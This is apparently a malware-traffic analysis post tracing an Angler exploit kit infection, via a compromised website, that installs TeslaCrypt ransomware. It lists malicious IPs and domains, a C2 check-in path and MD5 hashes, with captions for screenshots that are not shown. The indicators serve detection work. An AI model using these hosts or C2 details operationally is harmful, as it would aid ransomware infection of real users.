Angler EK from 95.211.18.75 sends TeslaCrypt

ASSOCIATED DOMAINS:

www.firstagarment.com – COMPROMISED SITE
95.211.18.75 – reukweerderjodis.crystalclearcleaningsevice.com – ANGLER EK
93.171.217.50 – img.golovkakrokodila.info GET /helloresearcher/ – Admedia gate (Did not play role in infection)
173.201.145.1 – dustinhansenbook.com POST /wstr.php – Post infection traffic [TeslaCrypt]

 

DETAILS:

Shown above: First malicious script found in  compromised site homepage

 

Shown above: Copied above hex to ascii converter shows redirect to “admedia” gate – img.golovkakrokodila.info

 

Shown above: Second malicious script found in  compromised site homepage

 

Shown above: Packet shows second javascript found in compromised site referered to Angler EK – not admedia gate

 

Shown above: Angler flash exploit kit and TelsaCrypt payload

 

Shown above: TeslaCrypt exe file and meta data

Shown above: TeslaCrypt post infection traffic – [C2 check-in]

 

MD5 HASHES FOR EXPLOITS AND PAYLOAD FROM ANGLER EK:

  • 095b16235c31ca41008fcc4fb19d391d – 03-02-2016-Angler.swf
  • 565c7c98445aba684c1ceca56aaa6ad7 – 03-02-2016-TeslaCFrypt.exe